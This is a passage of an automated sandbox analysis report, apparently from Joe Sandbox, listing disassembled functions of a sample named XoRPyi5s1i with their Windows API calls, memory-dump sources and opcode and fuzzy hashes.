                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                    • String ID:
                                    • API String ID: 1372826849-0
                                    • Opcode ID: 36ef9cb3048bdc0d33e215a0fc96d151c54f4f4e4939e045a68695f56ff83bf9
                                    • Instruction ID: 35dabc3099921d3d9ab1474e96d4c15a96cadd57317328e94716f1c63982c137
                                    • Opcode Fuzzy Hash: 36ef9cb3048bdc0d33e215a0fc96d151c54f4f4e4939e045a68695f56ff83bf9
                                    • Instruction Fuzzy Hash: 0701D676245602EAE6173B24EC46B2E23489B927AAF210025FD35DF182DBF09D4886A0
                                    Function 0017C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0017C385,?,?,?,?,?,00000004), ref: 0017C6F2
                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0017C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0017C708
                                    • CloseHandle.KERNEL32(00000000,?,0017C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0017C70F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleTime
                                    • String ID:
                                    • API String ID: 3397143404-0
                                    • Opcode ID: e777aa5d39bb61e915bb385b1e499aebd2a88b21932187638ea94a3a4de41d86
                                    • Instruction ID: c1a49d754b8a2eb84210bbbeddefbcc4c51b4c2ae91c5e46db0678cbc54feb19
                                    • Opcode Fuzzy Hash: e777aa5d39bb61e915bb385b1e499aebd2a88b21932187638ea94a3a4de41d86
                                    • Instruction Fuzzy Hash: C0E08632140214B7D7251B58BC09FCA7B69AB45760F144210FB14790E1A7B125518798
                                    Function 0017BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 0017BB72
                                      • Part of subcall function 00151C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00157A85), ref: 00151CB1
                                      • Part of subcall function 00151C9D: GetLastError.KERNEL32(00000000,?,00157A85), ref: 00151CC3
                                    • _free.LIBCMT ref: 0017BB83
                                    • _free.LIBCMT ref: 0017BB95
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
                                    • Instruction ID: 292cb4fb027bb78f1289b543f3abfe83a6e8d3a328ac8bc03ad2239861cd913b
                                    • Opcode Fuzzy Hash: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
                                    • Instruction Fuzzy Hash: 30E05BA5745741D7DA3465796E88FB313DC4F14352714081EBC7DEB146CF24F84485B4
                                    Function 00132322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001322A4: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00132303
                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001325A1
                                    • CoInitialize.OLE32(00000000), ref: 00132618
                                    • CloseHandle.KERNEL32(00000000), ref: 001A503A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                    • String ID:
                                    • API String ID: 458326420-0
                                    • Opcode ID: 84d2a1b25314a23cc6b5a5c71aa5bc19540977a370705daf50f7c9e226d08bc0
                                    • Instruction ID: a718499c98fb2278e6ec3e62a7f491a46ad78dc055e7a7904f870978cb73cf23
                                    • Opcode Fuzzy Hash: 84d2a1b25314a23cc6b5a5c71aa5bc19540977a370705daf50f7c9e226d08bc0
                                    • Instruction Fuzzy Hash: 6C719EB4901385EBC304EFABBD914B9BBA4BBA93547A0466ED10AD7F71CB314485CF14
                                    Function 0017BBE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID: EA06
                                    • API String ID: 2638373210-3962188686
                                    • Opcode ID: 5efaa657e4fd48a8d123cd5b2883269bd4b9e1599d9ac0920cc104b231d7e1d9
                                    • Instruction ID: 70480c51665affd90888d7df2d41de9f9a7eef1845e4c31078208fa367d28e32
                                    • Opcode Fuzzy Hash: 5efaa657e4fd48a8d123cd5b2883269bd4b9e1599d9ac0920cc104b231d7e1d9
                                    • Instruction Fuzzy Hash: E3012D719042187EDB18C798CC56FFDBBF89B15301F00855AF567D7181D6B4E7088B60
                                    Function 0017FE7E Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                    Download Yara Rule
                                    APIs
                                    • __wsplitpath.LIBCMT ref: 0017FEDD
                                    • GetLastError.KERNEL32(00000002,00000000), ref: 0017FF96
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorLast__wsplitpath
                                    • String ID:
                                    • API String ID: 2679896820-0
                                    • Opcode ID: 31f211ce0adb1228a5e1ff697054d978f4a49184e403ee28d5849ab372f88032
                                    • Instruction ID: c232e1bdadc60cb6d947483462e01ecf228fdd2cdaa2087ae79b14b5a74c18a8
                                    • Opcode Fuzzy Hash: 31f211ce0adb1228a5e1ff697054d978f4a49184e403ee28d5849ab372f88032
                                    • Instruction Fuzzy Hash: 845191322043019FCB14EF64D491BAAB3E5BF59310F04856DF95A8B2E2CF30A946CB52
                                    Function 00158E63 Relevance: 3.1, APIs: 2, Instructions: 127COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    • __getbuf.LIBCMT ref: 00158EFA
                                    • __lseeki64.LIBCMT ref: 00158F6A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __getbuf__getptd_noexit__lseeki64
                                    • String ID:
                                    • API String ID: 3311320906-0
                                    • Opcode ID: 7e6d57b1535bae0ee250f5b59436942e7cc9da9264dde508fca493bd65224040
                                    • Instruction ID: 71f36024eff09e9d333b58d60e3199c1dc4d76b8b5010829a8e55af2627cb59f
                                    • Opcode Fuzzy Hash: 7e6d57b1535bae0ee250f5b59436942e7cc9da9264dde508fca493bd65224040
                                    • Instruction Fuzzy Hash: 0741F371500A01DFD3289B28C842A7A77E5EF59332B14861EECBA9F2D1DB74D8498B61
                                    Function 00133A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                    Download Yara Rule
                                    APIs
                                    • 74B1C8D0.UXTHEME ref: 00133A73
                                      • Part of subcall function 00151405: __lock.LIBCMT ref: 0015140B
                                      • Part of subcall function 00133ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00133AF3
                                      • Part of subcall function 00133ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00133B08
                                      • Part of subcall function 00133D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00133AA3,?), ref: 00133D45
                                      • Part of subcall function 00133D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00133AA3,?), ref: 00133D57
                                      • Part of subcall function 00133D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,001F1148,001F1130,?,?,?,?,00133AA3,?), ref: 00133DC8
                                      • Part of subcall function 00133D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00133AA3,?), ref: 00133E48
                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00133AB3
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                    • String ID:
                                    • API String ID: 3809921791-0
                                    • Opcode ID: bd252c7ca09571fd2cdf04c3248730bfb234458c9da891ff6efbea6fc5a0551a
                                    • Instruction ID: 568a47b782045e7ade014e54b594a069aec174723c57cd072c2ecfeed45d3aeb
                                    • Opcode Fuzzy Hash: bd252c7ca09571fd2cdf04c3248730bfb234458c9da891ff6efbea6fc5a0551a
                                    • Instruction Fuzzy Hash: 21119D71908341EBC300EF69EC4592ABBE8FFA5710F00891EF499C76B1DB709584CBA6
                                    Function 001347FF Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00134582,?,?,?,?,00132E1A), ref: 0013482D
                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00134582,?,?,?,?,00132E1A), ref: 001A4089
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: cfabfde9e299b976b3374ceffe2fee381dbca9b14b7f6bc232f9e714a928c511
                                    • Instruction ID: dccca27c309d49fb9ff03d00c392087cc1a9e21a6d7380e42911a0821bc3895a
                                    • Opcode Fuzzy Hash: cfabfde9e299b976b3374ceffe2fee381dbca9b14b7f6bc232f9e714a928c511
                                    • Instruction Fuzzy Hash: F9018C74244348BFF7250E68CD8AFA63ADCEB0176CF108358BAE56A1E0C7B12C85CB50
                                    Function 0015E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___lock_fhandle.LIBCMT ref: 0015EA29
                                    • __close_nolock.LIBCMT ref: 0015EA42
                                      • Part of subcall function 00157BDA: __getptd_noexit.LIBCMT ref: 00157BDA
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                    • String ID:
                                    • API String ID: 1046115767-0
                                    • Opcode ID: 527138aabf1a0d6f6a6413686098a19e6c277d2779ac6df1412efa99fbf62ac2
                                    • Instruction ID: f2aa3cd5a4fdf0d9a44c8fc9d280a46e05f39eba8762793859b0e8f7bccbbc93
                                    • Opcode Fuzzy Hash: 527138aabf1a0d6f6a6413686098a19e6c277d2779ac6df1412efa99fbf62ac2
                                    • Instruction Fuzzy Hash: 19117072D45650CAD71ABB78D84235C7AA16F92337F6A4340EC355F1E3CBB48A4886A1
                                    Function 00153839 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __lock_file_memset
                                    • String ID:
                                    • API String ID: 26237723-0
                                    • Opcode ID: 75e1414783615d1a1a0994c538508165ba4f7afdd02ea681e5e92a1dc697222f
                                    • Instruction ID: f6a4a432014666b637626281551bb09d4241f4c1e760b0e4d8c881298b4a83b9
                                    • Opcode Fuzzy Hash: 75e1414783615d1a1a0994c538508165ba4f7afdd02ea681e5e92a1dc697222f
                                    • Instruction Fuzzy Hash: AC018471900209EBCF26AFA5DC0249E7B61AF503A2F154619FC345F1A1D7318B69DB91
                                    Function 001535E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    • __lock_file.LIBCMT ref: 00153629
                                      • Part of subcall function 00154E1C: __lock.LIBCMT ref: 00154E3F
                                    • __fclose_nolock.LIBCMT ref: 00153634
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                    • String ID:
                                    • API String ID: 2800547568-0
                                    • Opcode ID: 6e4a0e86083a3eeca2783d0fc8df1b6adb072c64f7e7eeaa3465907c9a91c0eb
                                    • Instruction ID: a9262c6526d0e6d805548cc25fd4bcc5d4e1dfa8af50eb21405ee676c4ce2ab8
                                    • Opcode Fuzzy Hash: 6e4a0e86083a3eeca2783d0fc8df1b6adb072c64f7e7eeaa3465907c9a91c0eb
                                    • Instruction Fuzzy Hash: 9BF0B431901604EAD712BB65C80276E7AA06F61376F65810CEC30AF2C1CB7C8B099F95
                                    Function 0013E8A0 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b02b76be593ca06d9dd18e29d5eb1cdb603f5d1a0c94dc8d346a86dfa0c9a069
                                    • Instruction ID: 51c0397f56e4fcfb22face60bb35ee2015b4a69710f9b57652145a0cedff822c
                                    • Opcode Fuzzy Hash: b02b76be593ca06d9dd18e29d5eb1cdb603f5d1a0c94dc8d346a86dfa0c9a069
                                    • Instruction Fuzzy Hash: D471F671908380DFEB26CF24C4857AA7BD1FB52314F08497AE8859B2E1E7759885CB42
                                    Function 0177BF80 Relevance: 1.7, APIs: 1, Instructions: 175COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0177B7F0: GetFileAttributesW.KERNELBASE(?), ref: 0177B7FB
                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0177C100
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1614350929.000000000177A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0177A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_177a000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AttributesCreateDirectoryFile
                                    • String ID:
                                    • API String ID: 3401506121-0
                                    • Opcode ID: 3a05c1840a2a5645db784fc2765bf88cfbabb70aece062a51c4b03a052d7656d
                                    • Instruction ID: 064a1068aed9e69df6cf10b3f9cc6452ee60fc3812857e85982b8590598dfeed
                                    • Opcode Fuzzy Hash: 3a05c1840a2a5645db784fc2765bf88cfbabb70aece062a51c4b03a052d7656d
                                    • Instruction Fuzzy Hash: 76618431A1020D97EF14EFB4D854BEEB33AEF58700F009569E60DE7290EB759A44CBA5
                                    Function 00152957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                    Download Yara Rule
                                    APIs
                                    • __flush.LIBCMT ref: 00152A0B
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __flush__getptd_noexit
                                    • String ID:
                                    • API String ID: 4101623367-0
                                    • Opcode ID: 604a52b038f9d89d146637e8f6a8a9ae492491e42f3dfb09f15d024a6db6c6d3
                                    • Instruction ID: fefcc096a3e0e3a2f3c2bd5153ba91875599a7ac6b2785d5d97e69a735c45a9b
                                    • Opcode Fuzzy Hash: 604a52b038f9d89d146637e8f6a8a9ae492491e42f3dfb09f15d024a6db6c6d3
                                    • Instruction Fuzzy Hash: C441D372700716DFDF2C8E69C8815AE77A6AF56362F24852DEC65CF640EBB0DD488B40
                                    Function 001346CE Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00134774
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
